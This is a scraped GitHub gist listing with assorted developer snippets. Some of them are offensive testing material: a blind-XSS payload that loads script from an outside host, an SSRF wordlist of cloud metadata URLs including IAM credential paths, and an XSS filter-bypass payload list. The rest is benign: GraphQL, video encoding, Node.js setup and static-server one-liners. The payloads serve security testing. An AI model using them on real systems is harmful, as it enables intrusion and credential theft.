Skip to content

Instantly share code, notes, and snippets.

Alexander Prinzhorn Prinzhorn

Block or report user

Report or block Prinzhorn

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@Rhynorater
Rhynorater / gist:311cf3981fda8303d65c27316e69209f
Last active May 8, 2020
BXSS - CSP Bypass with Inline and Eval
View gist:311cf3981fda8303d65c27316e69209f
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://rhy.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
@a7v8x
a7v8x / graphql_introspection_query.graphql
Last active May 28, 2020
GraphQL introspection query - for fetching the whole schema (from GraphiQL IDE) for https://atheros.ai/blog/graphql-introspection-and-introspection-queries
View graphql_introspection_query.graphql
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
types {
...FullType
}
directives {
name
description
@jhaddix
jhaddix / cloud_metadata.txt
Last active May 30, 2020 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@maxogden
maxogden / bibtex.png
Last active May 30, 2020
How to make a scientific looking PDF from markdown (with bibliography)
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active May 30, 2020
XSS Filter Bypass List
View xxsfilterbypass.lst
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@Vestride
Vestride / encoding-video.md
Last active May 30, 2020
Encoding video for the web
View encoding-video.md

Encoding Video

Installing

Install FFmpeg with homebrew. You'll need to install it with a couple flags for webm and the AAC audio codec.

brew install ffmpeg --with-libvpx --with-libvorbis --with-fdk-aac --with-opus
@hueniverse
hueniverse / gist:7686452
Last active May 26, 2020
Walmart Mobile node.js Setup
View gist:7686452

Overview

We run multiple server processes in two data centers. Each process listens on two ports, one for HTTP and one for HTTPS. HTTPS is terminated by Apache prior to reaching node.js. HTTP goes directly from the client to node.js (through a master load balancer). We do not use clusters. We slice our physical servers into thin virtual machines running SmartOS, each with about 3GB of memory designed for a single node.js process.

Our node.js servers are hapi.js servers using the composer functionality and plugins architecture. We have three sets of plugins loaded: mobile web front end experience (single page app), legacy API reverse proxy, and monitoring.

We also serve original node.js services off another server zone which runs closed source plugins using hapi.

Analytics

@hyle
hyle / ko.utils.3.0.0.signatures.js
Created Oct 25, 2013
KnockoutJS 3.0.0 utils (ko.utils) signatures
View ko.utils.3.0.0.signatures.js
// knockout 3.0.0
ko.utils.addOrRemoveItem = function (array, value, included) { /* .. */ }
ko.utils.anyDomNodeIsAttachedToDocument = function (nodes) { /* .. */ }
ko.utils.arrayFilter = function (array, predicate) { /* .. */ }
ko.utils.arrayFirst = function (array, predicate, predicateOwner) { /* .. */ }
@ichabodcole
ichabodcole / Web Audio API - Sound Fading
Created Jul 3, 2013
Reference for fading in and out sounds with the Web Audio API
View Web Audio API - Sound Fading
fadeTo: (value, fadeLength)->
fadeLength = fadeLength || @defaultfadeLength
currentTime = @ctx.currentTime
#time the fade should complete
fadeTime = currentTime + fadeLength
#set the start time
@masterGain.gain.setValueAtTime(@userVolume, currentTime)
@masterGain.gain.linearRampToValueAtTime(value, fadeTime)
fadeOut: (fadeLength)->
@willurd
willurd / web-servers.md
Last active Jun 1, 2020
Big list of http static server one-liners
View web-servers.md

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000
You can’t perform that action at this time.